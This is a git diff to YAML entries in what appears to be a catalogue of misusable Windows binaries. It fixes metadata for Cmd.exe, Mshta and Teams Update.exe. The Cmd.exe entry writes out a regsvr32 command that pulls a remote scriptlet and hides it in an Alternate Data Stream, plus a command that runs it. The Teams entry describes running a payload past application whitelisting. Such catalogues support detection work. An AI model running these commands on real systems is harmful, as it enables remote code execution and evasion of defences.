diff --git a/yml/OSBinaries/Cmd.exe.yml b/yml/OSBinaries/Cmd.exe.yml index 43b9565..1fc9f9f 100644 --- a/yml/OSBinaries/Cmd.exe.yml +++ b/yml/OSBinaries/Cmd.exe.yml @@ -1,19 +1,24 @@ +--- Name: Cmd.exe Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' Created: '2019-06-26' Commands: - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat - Description: To add content in an Alternate Data Stream (ADS). - - Command: cmd.exe - < fakefile.doc:payload.bat - Description: Execute payload.bat which is stored in an Alternate Data Stream (ADS). - + Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User - MitreID: T - MitreLink: https://attack.mitre.org/wiki/Technique/T + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: cmd.exe - < fakefile.doc:payload.bat + Description: Execute payload.bat stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism + Category: ADS + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\cmd.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 13acc84..d5ef45f 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -35,7 +35,7 @@ Commands: Privileges: User MitreID: T1170 MitreLink: https://attack.mitre.org/wiki/Technique/T1170 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe diff --git a/yml/OtherMSBinaries/Teams-update.yml b/yml/OtherMSBinaries/Teams-update.yml index 91464f8..91c46cc 100644 --- a/yml/OtherMSBinaries/Teams-update.yml +++ b/yml/OtherMSBinaries/Teams-update.yml @@ -1,25 +1,32 @@ --- Name: Update.exe Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case) -Author: Mr.Un1k0d3r -Created: 2019-06-26 +Author: 'Mr.Un1k0d3r' +Created: '2019-06-26' Commands: - - Command: Copy your payload into `%userprofile%\AppData\Local\Microsoft\Teams\current\`. Then run the following command `%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"` - Description: The Update.exe will execute the file you copied into the current folder. + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass Category: AWL Bypass - Privileges: user privs - MitreID: T1033 - MitreLink: https://attack.mitre.org/wiki/Technique/T1033 + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: -- Path: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe - + - Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe' Detection: -- IOC: Update.exe spawned an unknown process + - IOC: Update.exe spawned an unknown process Resources: - - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 - Acknowledgement: + - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 +Acknowledgement: - Person: Mr.Un1k0d3r - Handle: @MrUn1k0d3r + Handle: '@MrUn1k0d3r' ---